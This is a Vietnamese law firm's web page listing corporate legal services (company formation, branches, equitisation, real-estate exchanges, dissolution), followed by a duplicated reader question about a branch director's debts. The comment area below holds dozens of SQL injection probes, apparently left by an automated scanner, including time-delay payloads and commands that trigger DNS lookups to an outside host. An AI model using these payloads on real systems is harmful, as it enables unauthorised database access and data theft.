Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
 • Tư vấn trực tuyến miễn phí
 • Đội ngũ Luật sư uy tín
 • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Dịch vụ tư vấn Doanh nghiệp

Cập nhật lần cuối lúc 16:28 ngày 27/05/2013

 • Trả lời (50)
 • Chuyên gia trả lời

1. Thành lập, thay đổi, chuyển đổi doanh nghiệp

a. Thành lập doanh nghiệp

 • Xác định đối tượng được thành lập doanh nghiệp và đối tượng không được thành lập doanh nghiệp.
 • Tư vấn lựa chọn loại hình doanh nghiệp như: Công ty trách nhiệm hữu hạn một thành viên, Công ty trách nhiệm hữu hạn hai thành viên trở lên, Công ty cổ phần, Công ty hợp danh, Doanh nghiệp tư nhân.
 • Tư vấn đặt tên cho doanh nghiệp: tra cứu sơ bộ tên doanh nghiêp, tên doanh nghiệp không bị rơi vào các trường hợp bị cấm và có khả năng đăng ký nhãn hiệu, đăng ký tên miền.
 • Tư vấn về ngành nghề kinh doanh: Các ngành nghệ kinh doanh có điều kiện (điều kiện về chứng chỉ hành nghề, điều kiện về giấy phép hành nghề, điều kiện về vốn pháp định, các điều kiện khác.
 • Tư vấn về vốn: Mức vốn liên quan đến hoạt động của doanh nghiệp (vốn điều lệ của doanh nghiệp, vốn pháp định, vốn đầu tư…) và ảnh hưởng của các loại thuế liên quan đến mức vốn của doanh nghiệp.
 • Tư vấn đối tượng được thành lập doanh nghiệp: Người đại diện theo pháp luật của doanh nghiệp. Soạn thảo hồ sơ thành lập doanh nghiệp. Thực hiện các dịch vụ thành lập doanh nghiệp theo uỷ quyền của khách hàng.

b. Thay đổi nội dung đăng ký kinh doanh

Thay đổi đăng ký kinh doanh: Thay đổi tên công ty; thay đổi trụ sở chinh; thay đổi giám đốc (người đại diện theo pháp luật); thay đổi vốn điều lệ; thay đổi, bổ sung ngành nghề đăng ký kinh doanh, thay đổi cổ đông( thành viên) công ty…

c. Chuyển đổi doanh nghiệp

Nội dung chuyển đổi loại hình doanh nghiệp bao gồm công ty TNHH hai thành viên chuyển đổi thành công ty CP hoặc ngược lại (theo điều 154 Luật Doanh nghiệp 2005)

 


2. Thành lập Văn phòng đại diện, Chi nhánh, địa điểm kinh doanh

 • Văn phòng đại diện là đơn vị phụ thuộc của doanh nghiệp, có nhiệm vụ đại diện theo uỷ quyền cho lợi ích của doanh nghiệp và bảo vệ các lợi ích đó. Tổ chức và hoạt động của văn phòng
 • Chi nhánh là đơn vị phụ thuộc của doanh nghiệp, có nhiệm vụ thực hiện toàn bộ hoặc một phần chức năng của doanh nghiệp kể cả chức năng đại diện theo uỷ quyền. Ngành, nghề kinh doanh của chi nhánh phải phù hợp với ngành, nghề kinh doanh của doanh nghiệp.
 • Địa điểm kinh doanh là nơi hoạt động kinh doanh cụ thể của doanh nghiệp được tổ chức thực hiện. Địa điểm kinh doanh có thể ở ngoài địa chỉ đăng ký trụ sở chính.
 •  Chi nhánh, văn phòng đại diện và địa điểm kinh doanh phải mang tên của doanh nghiệp, kèm theo phần bổ sung tương ứng xác định chi nhánh, văn phòng đại diện và địa điểm kinh doanh đó.
 • Doanh nghiệp có quyền lập chi nhánh, văn phòng đại diện ở trong nước và nước ngoài. Doanh nghiệp có thể đặt một hoặc nhiều văn phòng đại diện, chi nhánh tại một địa phương theo địa giới hành chính.              

3. Cổ phần hoá doanh nghiệp nhà nước

Đối tượng cổ phần hóa:

 • Công ty nhà nước độc lập thuộc các Bộ, ngành, địa phương.
 • Công ty mẹ của Tập đoàn kinh tế (sau đây gọi tắt là tập đoàn), Tổng công ty nhà nước (kể cả Ngân hàng Thương mại nhà nước).
 • Công ty mẹ trong tổ hợp công ty mẹ - công ty con.
 • Công ty thành viên hạch toán độc lập thuộc Tổng công ty do Nhà nước quyết định đầu tư và thành lập.
 • Đơn vị hạch toán phụ thuộc của công ty nhà nước độc lập, tập đoàn, tổng công ty nhà nước, công ty mẹ, công ty thành viên hạch toán độc lập của Tổng công ty.
 • Công ty trách nhiệm hữu hạn do Nhà nước nắm giữ 100% vốn điều lệ.

4. Thành lập Sàn giao dịch bất động sản

 

   Điều kiện thành lập sàn giao dịch bất động sản

 •  PhảI có ít nhất hai người có chứng chỉ môI giới BĐS. Nếu có dịch vụ định giá BĐS thì phảI có thêm ít nhất 02 người có chứng chỉ định giá BĐS
 •  PhảI có ngành nghề Kinh doanh dich vụ bất động sản ( tư vấn, quản lý, quảng cáo, địn giá, môI giới)
 •  Có quy chế hoạt động của sàn giao dịch BĐS
 •  Có cơ sở vật chất, kỹ thuật phù hợp với nội dung hoạt động của sàn giao dịch BĐS
 •  Có người quản lý, điều hành được đào tạo về chuyên môn
 •  Sàn giao dịc BĐS phảI là pháp nhân
 •  Vốn điều lệ phảI trên 6tỷ
 •  Diện tích sử dụng tối thiểu là 50m2 phục vụ cho hạot động môI giới, giao dịch và thêm 20m2 cho mồi hoạt động dịch vụ bổ sung
 •  Sàn giao dịch pảI có tên, biển hiệu và địa chỉ giao dịch ổn định trong thời hạn 01 năm ( thể hiện bằng HĐ thuê nhà hoặc mượn nhà)

5. Tư vấn giải thể doanh nghiệp

   Doanh nghiệp bị giải thể trong các trường hợp sau đây:

 • Kết thúc thời hạn hoạt động đã ghi trong Điều lệ công ty mà không có quyết định gia hạn;
 • Theo quyết định của chủ doanh nghiệp đối với doanh nghiệp tư nhân; của tất cả thành viên hợp danh đối với công ty hợp danh; của Hội đồng thành viên, chủ sở hữu công ty đối với công ty trách nhiệm hữu hạn; của Đại hội đồng cổđông đối với công ty cổ phần;
 • Công ty không còn đủ số lượng thành viên tối thiểu theo quy định của Luật này trong thời hạn sáu tháng liên tục;
 • Bị thu hồi Giấy chứng nhận đăng ký kinh doanh. 
  Doanh nghiệp chỉ được giải thể khi bảo đảm thanh toán hết các khoản nợ và nghĩa vụ tài sản khác.

Chào tư vấn đời sống pháp luật. Tôi xin có câu hỏi để nhờ bộ phận tư vấn pháp luật gỡ rối giúp. Tôi hiện tại đang làm Giám đốc chi nhánh cùa 1 cty cổ phần xây dựng và trang trí nội thất, chi nhánh cty tôi hoạch toán độc lập với cty về tài chính và thuế.( Phần lớn số công việc của chi nhánh đều là làm cho cty và có hợp đồng và xuất hoá đơn cho cty.) Nhưng hiện tại tôi đang gặp rắc rối như vậy do tôi làm giám độc chi nhánh nhưng phần thu chi thì cty quản lý nên dẫn tới nợ rất nhiều các nhà cung cấp và nợ thuế GTGT nhà nước, nợ BHXH ( về mặt giấy tờ thì cty đã chuyển tiền vào chi nhánh hết rồi thông qua ngân hàng. Nhưng về giấy tờ nội bộ thì cty lấy tiền của chi nhánh khá nhiều khoảng 4,5 tỉ đồng) hiện tại chi nhánh còn đang thiếu nợ thuế giá trị gia tăng của nhà nước khoảng 900 triệu đồng và của BHXH khoảng gần 100 triệu và các nhà cung cấp khoảng gần 2,5 tỉ. cho tôi hỏi vậy tôi có phải chịu trách nhiệm trước pháp luật về những khoản nợ này ko hay la cty chịu. Nếu như tôi phải chịu trách nhiệm trước pháp luật thì tôi phải làm sao để bảo vệ mình. Xin hay tư vấn giúp tôi. qua địa chỉ email ; hoanghung.proad@gmail.com. Xin chân thành cám ơn.
Chào tư vấn đời sống pháp luật. Tôi xin có câu hỏi để nhờ bộ phận tư vấn pháp luật gỡ rối giúp. Tôi hiện tại đang làm Giám đốc chi nhánh cùa 1 cty cổ phần xây dựng và trang trí nội thất, chi nhánh cty tôi hoạch toán độc lập với cty về tài chính và thuế.( Phần lớn số công việc của chi nhánh đều là làm cho cty và có hợp đồng và xuất hoá đơn cho cty.) Nhưng hiện tại tôi đang gặp rắc rối như vậy do tôi làm giám độc chi nhánh nhưng phần thu chi thì cty quản lý nên dẫn tới nợ rất nhiều các nhà cung cấp và nợ thuế GTGT nhà nước, nợ BHXH ( về mặt giấy tờ thì cty đã chuyển tiền vào chi nhánh hết rồi thông qua ngân hàng. Nhưng về giấy tờ nội bộ thì cty lấy tiền của chi nhánh khá nhiều khoảng 4,5 tỉ đồng) hiện tại chi nhánh còn đang thiếu nợ thuế giá trị gia tăng của nhà nước khoảng 900 triệu đồng và của BHXH khoảng gần 100 triệu và các nhà cung cấp khoảng gần 2,5 tỉ. cho tôi hỏi vậy tôi có phải chịu trách nhiệm trước pháp luật về những khoản nợ này ko hay la cty chịu. Nếu như tôi phải chịu trách nhiệm trước pháp luật thì tôi phải làm sao để bảo vệ mình. Xin hay tư vấn giúp tôi. qua địa chỉ email ; hoanghung.proad@gmail.com. Xin chân thành cám ơn.
-1));select pg_sleep(6.562); --
-1; waitfor delay '0:0:9.843' --
1
1 waitfor delay '0:0:3.281' --
puEdMrGP'; waitfor delay '0:0:3.281' --
-1);select pg_sleep(6.562); --
-1;select pg_sleep(3.281); --
-1); waitfor delay '0:0:3.281' --
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-3339.34060.ee307.\1.bxss.me'
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3337.34060.ee307.1.bxss'||'.me')||'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-3340.34060.ee307.\1.bxss.me
M5ZIYyYt';select pg_sleep(6.562); --
2TuvWgNN';select pg_sleep(3.281); --
oSkHhi93');select pg_sleep(9.843); --
sNH90DXk'));select pg_sleep(9.843); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3332.34060.ee307.1.bxss'||'.me')
455'
1
1
1'"
-1 OR 2+721-721-1=0+0+0+1 --
-1 OR 3+721-721-1=0+0+0+1 --
\
-1 OR 3*2<(0+5+721-721) --
1
@@Fj6gR
-1 OR 3*2>(0+5+721-721) --
JyI=
-1 OR 2+65-65-1=0+0+0+1
-1 OR 3+65-65-1=0+0+0+1
-1 OR 3*2<(0+5+65-65)
-1 OR 3*2>(0+5+65-65)
-1' OR 2+302-302-1=0+0+0+1 --
-1' OR 3+302-302-1=0+0+0+1 --
-1' OR 3*2<(0+5+302-302) --
-1' OR 3*2>(0+5+302-302) --
-1' OR 2+911-911-1=0+0+0+1 or 'hO3i2bsB'='
-1' OR 3+911-911-1=0+0+0+1 or 'hO3i2bsB'='
-1' OR 3*2<(0+5+911-911) or 'hO3i2bsB'='
-1' OR 3*2>(0+5+911-911) or 'hO3i2bsB'='
-1" OR 2+524-524-1=0+0+0+1 --
-1" OR 3+524-524-1=0+0+0+1 --
-1" OR 3*2<(0+5+524-524) --
-1" OR 3*2>(0+5+524-524) --
if(now()=sysdate(),sleep(6.562),0)/*'XOR(if(now()=sysdate(),sleep(6.562),0))OR'"XOR(if(now()=sysdate(),sleep(6.562),0))OR"*/
(select(0)from(select(sleep(9.843)))v)/*'+(select(0)from(select(sleep(9.843)))v)+'"+(select(0)from(select(sleep(9.843)))v)+"*/

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề:
Bài viết liên quan